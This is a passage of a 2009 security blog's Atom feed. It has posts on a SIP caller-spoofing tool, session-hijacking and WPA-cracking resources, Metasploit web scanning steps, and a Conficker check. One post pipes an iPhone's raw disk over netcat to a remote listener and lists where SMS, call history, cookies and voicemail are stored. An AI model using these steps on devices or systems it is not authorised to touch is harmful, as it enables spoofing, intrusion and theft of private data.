src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-7953605374593312985</id><published>2009-05-09T23:02:00.000-07:00</published><updated>2009-05-10T02:57:12.240-07:00</updated><title type='text'>sip00fer</title><content type='html'>After a looong week, i`ve finished my case study on PBX (Asterisk). A new &lt;a href="http://www.asterisk.org/"&gt;1.6.1.0 Asterisk&lt;/a&gt; version was installed on &lt;a href="http://www.centos.org/"&gt;CentOS&lt;/a&gt;, a great disto. and by the help of the SIP M4ST3R Yossef{at}&lt;a href="http://www.maxxvoice.com/"&gt;maxxvoice&lt;/a&gt;{dot}com I managed to \install\ AND \configure\ my new PBX up&amp;&amp;running in few hours. [./configure; make; make install] simple as that.&lt;br /&gt;&lt;br /&gt;Then, I started testing my Asterisk box, as i saw a sample code that can create a fake call to any extension on &lt;a href="http://www.metasploit.com/"&gt;metasploit&lt;/a&gt; framework. The code didn`t work on against a new 1.6.0.5 as Yossef found that the CSeq var is missing so i decided to implement it by my self, i used &lt;a href="http://www.faqs.org/rfcs/rfc3261.html"&gt;RFC3261&lt;/a&gt; to deeply understand the protocol and to expend my research to this fascinating area.&lt;br /&gt;&lt;br /&gt;I wrote a POC code in python and then convert it to C++ the POC will build a fake packet and send it to sip client.&lt;br /&gt;&lt;br /&gt;The code will be posted soon -&gt; &lt;a href="http://www.ilhack.org/2009/"&gt;ilHack 2009 &lt;/a&gt; &lt;- along with a new SIPcliFuzzer.&lt;br /&gt;&lt;br /&gt;Usage: sip00fer [host] [port] [fake_extension] [Fake_Caller]&lt;br /&gt;Example: sip00fer 13.37.7.1 31317 101 jackjack&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_RROvHJzP0eo/SgaLS2FHynI/AAAAAAAAADQ/aemO2nx8HjE/s1600-h/fake_caller.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 130px;" src="http://3.bp.blogspot.com/_RROvHJzP0eo/SgaLS2FHynI/AAAAAAAAADQ/aemO2nx8HjE/s200/fake_caller.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5334103964537834098" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-7953605374593312985?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/7953605374593312985/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=7953605374593312985' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/7953605374593312985'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/7953605374593312985'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/05/sip00fer.html' title='sip00fer'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_RROvHJzP0eo/SgaLS2FHynI/AAAAAAAAADQ/aemO2nx8HjE/s72-c/fake_caller.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-3998329744608017449</id><published>2009-04-27T22:37:00.000-07:00</published><updated>2009-04-27T22:38:29.694-07:00</updated><title type='text'>Sidejacking</title><content type='html'>&lt;strong&gt;Hamster&lt;/strong&gt; is a tool for HTTP session hijacking with passive sniffing. It eavesdrops on a network, captures the session cookies, then imports them into the browser to allow you to hijack their session.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hamster.erratasec.com/"&gt;Download Link&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-3998329744608017449?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/3998329744608017449/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=3998329744608017449' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3998329744608017449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3998329744608017449'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/04/sidejacking.html' title='Sidejacking'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-8133781063050088208</id><published>2009-04-06T03:42:00.000-07:00</published><updated>2009-04-06T03:52:09.641-07:00</updated><title type='text'>Web (rat)Proxy</title><content type='html'>"Ratproxy is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments."&lt;br /&gt;&lt;br /&gt;Download ratproxy from the following &lt;a href="http://ratproxy.googlecode.com/files/ratproxy-1.56.tar.gz"&gt;Link&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;OR&lt;/strong&gt; use the following commands:&lt;br /&gt;&lt;br /&gt;$&gt; wget http://ratproxy.googlecode.com/files/ratproxy-1.56.tar.gz&lt;br /&gt;$&gt; tar xvf ratproxy-1.56.tar.gz&lt;br /&gt;$&gt; make&lt;br /&gt;&lt;br /&gt;On Firefox go to |Tools|Options|Advanced|Network|settings choose manual proxy (rat address). and execute ratproxy with the following command:&lt;br /&gt;$&gt; ./ratproxy -w &lt;strong&gt;logfile&lt;/strong&gt; -d domaintoscan -rlextifscpjm&lt;br /&gt;&lt;br /&gt;To get a report in html file use:&lt;br /&gt;$&gt; -./ratproxy-report.sh &lt;strong&gt;logfile &lt;/strong&gt;&gt; report.html&lt;br /&gt;&lt;br /&gt;Jacky Altal&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-8133781063050088208?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/8133781063050088208/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=8133781063050088208' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8133781063050088208'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8133781063050088208'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/04/web-ratproxy.html' title='Web (rat)Proxy'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-8497960067934253947</id><published>2009-04-06T03:28:00.000-07:00</published><updated>2009-04-06T03:32:11.310-07:00</updated><title type='text'>WPA Rainbow tables</title><content type='html'>Offensive security released a list of &lt;a href="http://www.offensive-security.com/wpa-tables/"&gt;Cowpatty WPA tables&lt;/a&gt;, SSID Specific, using a 49 Million WPA optimised password dictionary file. Each Table is 1.9 GB. &lt;br /&gt;&lt;br /&gt;Any one can help by seeding these files.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-8497960067934253947?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/8497960067934253947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=8497960067934253947' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8497960067934253947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8497960067934253947'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/04/wpa-rainbow-tables.html' title='WPA Rainbow tables'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-7137048545849640338</id><published>2009-04-06T02:35:00.000-07:00</published><updated>2009-04-06T04:12:21.177-07:00</updated><title type='text'>Infected with Confliker?</title><content type='html'>Conficker Test is a simple visual test that any one can take in order to evaluate a windows pc just by surfing to this page. Conficker is known to block access to over 100 anti-virus and security websites. This page will loads images from blocked security and antivirus websites.&lt;br /&gt;&lt;br /&gt;&lt;table border="0"&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt;&lt;td&gt;&lt;a href="http://eyechart.sie.isc.org/freebsd.png"&gt;&lt;img src="http://eyechart.sie.isc.org/freebsd.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;br /&gt;&lt;td&gt;&lt;a href="http://us.trendmicro.com/images/common/LogoTrendMicro_3d.gif"&gt;&lt;img src="http://us.trendmicro.com/images/common/LogoTrendMicro_3d.gif" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt;&lt;td&gt;&lt;a href="http://eyechart.sie.isc.org/openbsd.jpg"&gt;&lt;img src="http://eyechart.sie.isc.org/openbsd.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;br /&gt;&lt;td&gt;&lt;a href="http://www.secureworks.com/images/headerlogo.gif"&gt;&lt;img src="http://www.secureworks.com/images/headerlogo.gif" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/table&gt; &lt;br /&gt;&lt;br /&gt;If you are blocked from loading the remote images in the first row of the top table above (AV/security sites) but not blocked from loading the remote images in the second row (websites of alternative operating systems) then your Windows PC may be infected by Conficker (or some other malicious software). &lt;br /&gt;&lt;br /&gt;This test was originally developed by &lt;a href="http://www.joestewart.org/"&gt;Joe Stewart.&lt;/a&gt; As you can see it is a simple test method which can be used by any one.&lt;br /&gt;&lt;br /&gt;a link to Confliker removal tool can be found &lt;a href="http://www.mcafee.com/us/threat_center/conficker.html "&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jacky Altal&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-7137048545849640338?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/7137048545849640338/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=7137048545849640338' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/7137048545849640338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/7137048545849640338'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/04/infected-with-confliker.html' title='Infected with Confliker?'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-3182839488591458126</id><published>2009-04-02T05:46:00.000-07:00</published><updated>2009-04-02T05:59:33.761-07:00</updated><title type='text'>Manipulating Client Side Scripts</title><content type='html'>As you can see in the following &lt;a href="http://www.youtube.com/watch?v=eqeeaV69RoQ"&gt;link&lt;/a&gt; posted by &lt;a href="http://www.ilhack.org"&gt;Lament&lt;/a&gt; just yesterday, there is a big security flow in Ynet forums.&lt;br /&gt;&lt;br /&gt;I have read the mails between yaniv and Ynet respone team. And it seams like they are really dosent care. I`m not sure if yaniv did the right thing and post this movie, but no doubt that something had to be done.&lt;br /&gt;&lt;br /&gt;I have to admit that this particular flow was known for a while, and to be honest there are many others.....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-3182839488591458126?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/3182839488591458126/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=3182839488591458126' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3182839488591458126'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3182839488591458126'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/04/manipulating-client-side-scripts.html' title='Manipulating Client Side Scripts'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-8286415549947342445</id><published>2009-04-02T05:42:00.000-07:00</published><updated>2009-04-02T05:44:50.258-07:00</updated><title type='text'>Attacking SMM Memory via Intel® CPU Cache Poisoning</title><content type='html'>Attacking SMM Memory via Intel® CPU Cache Poisoning (March 2009) - a research paper published by Rafal Wojtczuk and Joanna Rutkowska describing a new attack that allows to compromise the integrity of the System Management Mode on Intel-based systems.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://invisiblethingslab.com/resources/bh09dc/Attacking%20Intel%20TXT%20-%20slides.pdf"&gt;PDF&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-8286415549947342445?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/8286415549947342445/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=8286415549947342445' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8286415549947342445'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8286415549947342445'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/04/attacking-smm-memory-via-intel-cpu.html' title='Attacking SMM Memory via Intel® CPU Cache Poisoning'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-3725699078831621761</id><published>2009-03-01T23:01:00.000-08:00</published><updated>2009-03-07T04:41:39.946-08:00</updated><title type='text'>ilHack \x32\x30\x30\x39</title><content type='html'>&lt;a href="http://ifis.org.il/"&gt;ifis.org.il&lt;/a&gt; the israeli security forum and yaniv Miron (CISO grad) announced the 2009 Hacking convention.&lt;br /&gt;&lt;br /&gt;Additional information can be found in the following link:&lt;br /&gt;&lt;br /&gt;-&lt;strong&gt;&lt;a href="http://www.ilhack.org/2009/?page_id=22"&gt;ilhack 2009&lt;/a&gt; convention 4/5/09&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-3725699078831621761?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/3725699078831621761/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=3725699078831621761' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3725699078831621761'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3725699078831621761'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/03/ilhack-x32x30x30x39.html' title='ilHack \x32\x30\x30\x39'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-3680534191260921662</id><published>2009-02-26T00:15:00.000-08:00</published><updated>2009-02-26T00:51:58.203-08:00</updated><title type='text'>SQL Queries</title><content type='html'>Still in the top &lt;a href="http://www.baselinemag.com/c/a/Security/Top-10-2009-Security-Threats-and-Vulnerabilities/"&gt;10 security threats for 2009&lt;/a&gt; Web Application attacks. During my work i`m facing DB`s that i`m not working on regular basis, which got me to c0mpile a list of queries for mssql, oracle, mysql, postgresql and msaccess. In the following &lt;a href="http://212.150.53.163/sql-injection-all.xls"&gt;xls&lt;/a&gt; file you can find the most used sql injection queries. The list &gt;&gt; constructed from data that i picked from several web sites and dring the days and n1ght of /me @work ;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-3680534191260921662?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/3680534191260921662/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=3680534191260921662' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3680534191260921662'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/3680534191260921662'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/02/sql-queries.html' title='SQL Queries'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-4097729337461628539</id><published>2009-02-17T05:32:00.000-08:00</published><updated>2009-02-26T00:52:14.306-08:00</updated><title type='text'>iPhone 2.2 Backup</title><content type='html'>In order to make a bit by bit copy use the following method:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;On your *nix box open up netcat:&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;nc -lvp 1337 | dd of=./imagem.dmg bs=4096&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;On your iPhone/ssh execute the following:&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;dd if=/dev/rdisk0s2 bs=4096 | netcat 192.168.1.100 1337&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;If you want to browse y0ur iPhone contents just follow the following directories:&lt;br /&gt;&lt;strong&gt;Calendar&lt;/strong&gt; /mobile/Library/Calendar/calendar.sqlitedb&lt;br /&gt;&lt;strong&gt;Call history&lt;/strong&gt; /mobile/Library/CallHistory/call_history.db&lt;br /&gt;&lt;strong&gt;Notes&lt;/strong&gt; /mobile/Library/Notes/notes.db&lt;br /&gt;&lt;strong&gt;SMS&lt;/strong&gt; /mobile/Library/SMS/sms.db&lt;br /&gt;&lt;strong&gt;Adress book&lt;/strong&gt; /mobile/Library/AddressBook/AddressBook.sqlitedb&lt;br /&gt;&lt;strong&gt;voicemail&lt;/strong&gt; /var/root/Library/Voicemail/voicemail.db&lt;br /&gt;&lt;strong&gt;Photos&lt;/strong&gt; /mobile/Media/DCIM/&lt;br /&gt;&lt;strong&gt;Photos&lt;/strong&gt; /mobile/Media/Photos&lt;br /&gt;&lt;strong&gt;Google Maps&lt;/strong&gt; /moblie/Library/Caches/MapTiles/MapTiles.sqlitedb&lt;br /&gt;&lt;strong&gt;Cookies&lt;/strong&gt; /mobile/Library/Cookies/Cookies.plist&lt;br /&gt;&lt;strong&gt;iPhone Recorder&lt;/strong&gt; /private/var/mobile/Media/iPhoneRecorder&lt;br /&gt;&lt;br /&gt;ג'קי אלטל&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-4097729337461628539?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/4097729337461628539/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=4097729337461628539' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/4097729337461628539'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/4097729337461628539'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/02/iphone-22-backup.html' title='iPhone 2.2 Backup'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-1034634369609912446</id><published>2009-02-17T01:31:00.000-08:00</published><updated>2009-02-17T05:32:01.461-08:00</updated><title type='text'>Advanced Exploitation with Metasploit</title><content type='html'>I decided to write a post about the new/advanced features in my favorite exploitation &lt;a href="http://www.metasploit.com"&gt;framework Metasploit&lt;/a&gt;. Those improved tools/features in the advanced framework includes wmap (application mapping), autopwn (what does it sounds like?)&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;strong&gt;WMAP &lt;/strong&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."&lt;br /&gt;&lt;br /&gt;&lt;em&gt;STEP 1: load sqlite3 database&lt;/em&gt;&lt;br /&gt;&gt;&lt;strong&gt;load db_sqlite3&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;STEP 2: Create new database&lt;/em&gt;&lt;br /&gt;&gt;&lt;strong&gt;db_create wmapjack.db&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;STEP 3: Load wmap Database&lt;/em&gt;&lt;br /&gt;&gt;&lt;strong&gt;load db_wmap&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;STEP 4: Connect to wmap database&lt;/em&gt;&lt;br /&gt;&gt;&lt;strong&gt;db_connect wmap.db&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Now just add web application target address&lt;br /&gt;&gt;&lt;strong&gt;wmap_targets -a http://127.0.0.1&lt;/strong&gt;&lt;br /&gt;Set it to the new target with the following command:&lt;br /&gt;&gt;&lt;strong&gt;wmap_targets -s 1&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;wmap_run - execute application mapping&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_RROvHJzP0eo/SZqieB2207I/AAAAAAAAACw/SJHGO1ARPms/s1600-h/wmap_run.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 48px;" src="http://3.bp.blogspot.com/_RROvHJzP0eo/SZqieB2207I/AAAAAAAAACw/SJHGO1ARPms/s200/wmap_run.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5303730147960476594" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The active modules are:&lt;br /&gt;wmap_ssl_vhost WMAP_SERVER &lt;br /&gt;frontpage_login WMAP_SERVER&lt;br /&gt;version WMAP_SERVER&lt;br /&gt;wmap_vhost_scanner WMAP_SERVER&lt;br /&gt;wmap_file_same_name_dir WMAP_DIR - this will take a while (bruteforcing directory names) &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;wmap_reports - view web application report&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_RROvHJzP0eo/SZqi5jAIABI/AAAAAAAAAC4/gWfK8JgeJ7U/s1600-h/wmap_reports.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 42px;" src="http://3.bp.blogspot.com/_RROvHJzP0eo/SZqi5jAIABI/AAAAAAAAAC4/gWfK8JgeJ7U/s200/wmap_reports.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5303730620714188818" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Test your application&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-1034634369609912446?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/1034634369609912446/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=1034634369609912446' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/1034634369609912446'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/1034634369609912446'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/02/advanced-exploitation-tool.html' title='Advanced Exploitation with Metasploit'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_RROvHJzP0eo/SZqieB2207I/AAAAAAAAACw/SJHGO1ARPms/s72-c/wmap_run.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-6833088136415840459</id><published>2009-02-11T00:47:00.000-08:00</published><updated>2009-02-11T00:52:30.728-08:00</updated><title type='text'>BackTrack 4 Beta 